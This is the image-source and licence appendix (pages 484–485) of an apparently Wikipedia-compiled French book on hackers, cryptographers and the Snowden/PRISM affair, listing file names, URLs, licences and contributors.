Fichier:Anonymous emblem.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Anonymous_emblem.svg Licence: Public Domain Contributeurs: Kephir, Magog the Ogre, Raoli, 2 modifications anonymes Fichier:Crystal_Clear_mimetype_mime-template_source.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_Clear_mimetype_mime-template_source.png Licence: inconnu Contributeurs: Augiasstallputzer, CyberSkull, Rocket000 Image:Ccc2003PirateTent.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Ccc2003PirateTent.jpg Licence: GNU Free Documentation License Contributeurs: Paul Vlaar (= user Neep) Fichier:Tron platine2.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Tron_platine2.jpg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: User:Elya Image:Lamo-Mitnick-Poulsen.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Lamo-Mitnick-Poulsen.png Licence: Public Domain Contributeurs: Matthew Griffiths Fichier:Theo de raadt.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Theo_de_raadt.jpg Licence: Public Domain Contributeurs: Church of emacs, Kocio, Linuxerist, 1 modifications anonymes Fichier:Flag of South Africa.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_South_Africa.svg Licence: inconnu Contributeurs: Adriaan, Anime Addict AA, AnonMoos, BRUTE, Daemonic Kangaroo, Dnik, Duduziq, Dzordzm, Fry1989, Homo lupus, Jappalang, Juliancolton, Kam Solusar, Klemen Kocjancic, Klymene, Lexxyy, MAXXX-309, Mahahahaneapneap, Manuelt15, Moviedefender, NeverDoING, Ninane, Poznaniak, Przemub, Ricordisamoa, SKopp, Sarang, SiBr4, ThePCKid, ThomasPusch, Tvdm, Ultratomio, Vzb83, Zscout370, 37 modifications anonymes Fichier:Flag of Canada.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Canada.svg Licence: Public Domain Contributeurs: User:E Pluribus Anthony, User:Mzajac Fichier:Len-mankin-pic.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Len-mankin-pic.jpg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: len adlmen Fichier:Flag of the United States.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_the_United_States.svg Licence: Public Domain Contributeurs: Dbenbenn, Zscout370, Jacobolus, Indolences, Technion. Fichier:Racine_carrée_bleue.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Racine_carrée_bleue.svg Licence: GNU Lesser General Public License Contributeurs: historicair 17:50, 4 June 2007 (UTC) Image:Whitfield Diffie.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Whitfield_Diffie.png Licence: Creative Commons Attribution 2.0 Contributeurs: Original uploader was Matt Crypto at en.wikipedia Fichier:Taher Elgamal it-sa 2010.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Taher_Elgamal_it-sa_2010.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Alexander Klink Image:Martin-Hellman.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Martin-Hellman.jpg Licence: GNU Free Documentation License Contributeurs: User .:Ajvol:. on en.wikipedia Image:Arjen lenstra.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Arjen_lenstra.jpg Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: User:Dake Fichier:Ralph Merkle.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Ralph_Merkle.png Licence: Creative Commons Attribution 2.0 Contributeurs: Docu, FlickreviewR, Gryllida, Sreejithk2000 Image:David Naccache.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:David_Naccache.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Alexander Klink File:Sherman, Rivest, and Chaum.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Sherman,_Rivest,_and_Chaum.jpg Licence: Creative Commons Attribution 2.0 Contributeurs: carback1 Image:Bruce Schneier 1.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Bruce_Schneier_1.jpg Licence: Creative Commons Attribution-Sharealike 2.0 Contributeurs: sfllaw Fichier:Adi Shamir 2009 crop.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Adi_Shamir_2009_crop.jpg Licence: Creative Commons Attribution-Sharealike 2.0 Contributeurs: FlickreviewR, Gert7, Materialscientist Fichier:Flag of Israel.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Israel.svg Licence: Public Domain Contributeurs: “The Provisional Council of State Proclamation of the Flag of the State of Israel” of 25 Tishrei 5709 (28 October 1948) provides the official specification for the design of the Israeli flag. The color of the Magen David and the stripes of the Israeli flag is not precisely specified by the above legislation. The color depicted in the current version of the image is typical of flags used in Israel today, although individual flags can and do vary. The flag legislation officially specifies dimensions of 220 cm × 160 cm. However, the sizes of actual flags vary (although the aspect ratio is usually retained). File:Dmitry Sklyarov it-sa 2010.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Dmitry_Sklyarov_it-sa_2010.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Alexander Klink Fichier:Jacques Stern p1140541.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Jacques_Stern_p1140541.jpg Licence: GNU Free Documentation License Contributeurs: User:David.Monniaux Image:Phil zimmermann.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Phil_zimmermann.jpg Licence: GNU Free Documentation License Contributeurs: Phil Zimmermann, uploaded by Matt Crypto Image: Terry_Fox_Statue_db_crop.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Terry_Fox_Statue_db_crop.jpg Licence: GNU Free Documentation License Contributeurs: - Fichier:Edward Snowden-2.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Edward_Snowden-2.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Edward_Snowden.jpg: Laura Poitras / Praxis Films derivative work: Hic et nunc Fichier:Snowden undated.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Snowden_undated.jpg Licence: Public Domain Contributeurs: A1candidate, LGA Fichier:PRISM logo (PNG).png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:PRISM_logo_(PNG).png Licence: Attribution Contributeurs: User:Yintan Image:Hong kong skyline 2.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Hong_kong_skyline_2.jpg Licence: Creative Commons Attribution 2.0 Contributeurs: Georgio Source des images, licences et contributeurs 484

Fichier:Ambox currentevent.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Ambox_currentevent.svg Licence: Creative Commons Public Domain Contributeurs: Vipersnake151 , penubag, Tkgd2007 (clock) File:Edward Joseph Snowden - Arrival at Sheremetyevo International Airport 03.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Edward_Joseph_Snowden_-_Arrival_at_Sheremetyevo_International_Airport_03.jpg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:Dmitry Rozhkov Fichier:Edward Joseph Snowden - Arrival at Sheremetyevo International Airport 04.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Edward_Joseph_Snowden_-_Arrival_at_Sheremetyevo_International_Airport_04.jpg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:Dmitry Rozhkov File:Berlin 2013 PRISM Demo.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Berlin_2013_PRISM_Demo.jpg Licence: Creative Commons Attribution-Sharealike 2.0 Contributeurs: Mike Herbst from Berlin, Germany File:Snowden's supporters in Warsaw 5 July 2013.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Snowden's_supporters_in_Warsaw_5_July_2013.jpg Licence: Creative Commons Zero Contributeurs: User:Meo Hav Image:Evo Morales at COP15.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Evo_Morales_at_COP15.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Simon Wedege Fichier:Crystal Clear app database.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_Clear_app_database.png Licence: GNU Free Documentation License Contributeurs: Augiasstallputzer, CyberSkull, Herbythyme, 1 modifications anonymes Fichier:Crystal 128 knode.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_128_knode.png Licence: inconnu Contributeurs: Bitplane, Dake, Joey-das-WBF, Mytto, Rocket000 Image: Crystal 128 knode.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_128_knode.png Licence: inconnu Contributeurs: Bitplane, Dake, Joey-das-WBF, Mytto, Rocket000 Image:CDC LOGO.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:CDC_LOGO.jpg Licence: GNU Free Documentation License Contributeurs: Cult of the Dead Cow Image: Germanyfilm.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Germanyfilm.svg Licence: GNU Lesser General Public License Contributeurs: Ysangkok Image: United States film.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:United_States_film.svg Licence: GNU Lesser General Public License Contributeurs: Ysangkok Fichier:Flag of France.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_France.svg Licence: Public Domain Contributeurs: User:SKopp, User:SKopp, User:SKopp, User:SKopp, User:SKopp, User:SKopp Fichier:United States film.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:United_States_film.svg Licence: GNU Lesser General Public License Contributeurs: Ysangkok Fichier:WillisLongWisemanSept06.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:WillisLongWisemanSept06.jpg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Holly M. Rawson at http://www.hollyrawson.com Fichier: Information_icon.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Information_icon.svg Licence: Public domain Contributeurs: El T Image:Flag of the United States.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_the_United_States.svg Licence: Public Domain Contributeurs: Dbenbenn, Zscout370, Jacobolus, Indolences, Technion. Image:Flag of France.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_France.svg Licence: Public Domain Contributeurs: User:SKopp, User:SKopp, User:SKopp, User:SKopp, User:SKopp, User:SKopp Image:Flag of Japan.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Japan.svg Licence: Public Domain Contributeurs: Various Image:Flag of Belgium (civil).svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Belgium_(civil).svg Licence: Public Domain Contributeurs: Bean49, Cathy Richards, David Descamps, Dbenbenn, Denelson83, Evanc0912, Fry1989, Gabriel trzy, Howcome, IvanOS, Mimich, Ms2ger, Nightstallion, Oreo Priest, Ricordisamoa, Rocket000, Rodejong, SiBr4, Sir Iain, ThomasPusch, Warddr, Zscout370, 6 modifications anonymes Fichier:Crystal Clear app package network.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_Clear_app_package_network.png Licence: GNU Free Documentation License Contributeurs: CyberSkull, It Is Me Here, Sandstein, 1 modifications anonymes Fichier:Flag of Switzerland.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Switzerland.svg Licence: Public Domain Contributeurs: User:Marc Mongenet Credits: User:-xfi- User:Zscout370 Fichier:Broom icon.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Broom_icon.svg Licence: GNU General Public License Contributeurs: Bayo, Booyabazooka, Davepape, Dcoetzee, Herbythyme, Ilmari Karonen, Javierme, Perhelion, Rocket000, TMg, The Evil IP address, 11 modifications anonymes Fichier:Flag of the United Kingdom.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_the_United_Kingdom.svg Licence: Public Domain Contributeurs: Original flag by Acts of Union 1800SVG recreation by User:Zscout370 Fichier:Flag of Belgium (civil).svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Belgium_(civil).svg Licence: Public Domain Contributeurs: Bean49, Cathy Richards, David Descamps, Dbenbenn, Denelson83, Evanc0912, Fry1989, Gabriel trzy, Howcome, IvanOS, Mimich, Ms2ger, Nightstallion, Oreo Priest, Ricordisamoa, Rocket000, Rodejong, SiBr4, Sir Iain, ThomasPusch, Warddr, Zscout370, 6 modifications anonymes Fichier:Emblem-question.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Emblem-question.svg Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: Rugby471 Fichier:TheMatrixAnimated.gif Source: http://fr.wikipedia.org/w/index.php?title=Fichier:TheMatrixAnimated.gif Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: TheMatrix.png: Kronin derivative work: Sapindnoel (talk) Fichier:The.Matrix.glmatrix.2.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:The.Matrix.glmatrix.2.png Licence: Attribution Contributeurs: Jamie Zawinski (program); Church of emacs (screenshot) Fichier:Flag of Australia.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Australia.svg Licence: Public Domain Contributeurs: Ian Fieggen Fichier:Nuvola apps konquest.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_konquest.svg Licence: GNU Free Documentation License Contributeurs: by David Vignoni (vector image made by User:Gothika with Adobe Illustrator) Fichier:WB-tip.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:WB-tip.png Licence: GNU Free Documentation License Contributeurs: Mikani Fichier:Alcatel 9109HA.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Alcatel_9109HA.png Licence: GNU Free Documentation License Contributeurs: GreyCat, Vascer Fichier:Armagetron Advanced.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Armagetron_Advanced.png Licence: GNU General Public License Contributeurs: Bayo, CyberSkull, 1 modifications anonymes Fichier:Coldwar.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Coldwar.png Licence: Creative Commons Attribution-Share Alike Contributeurs: Anynobody Licence 485 Licence

Creative Commons Attribution-Share Alike 3.0 Unported //creativecommons.org/licenses/by-sa/3.0/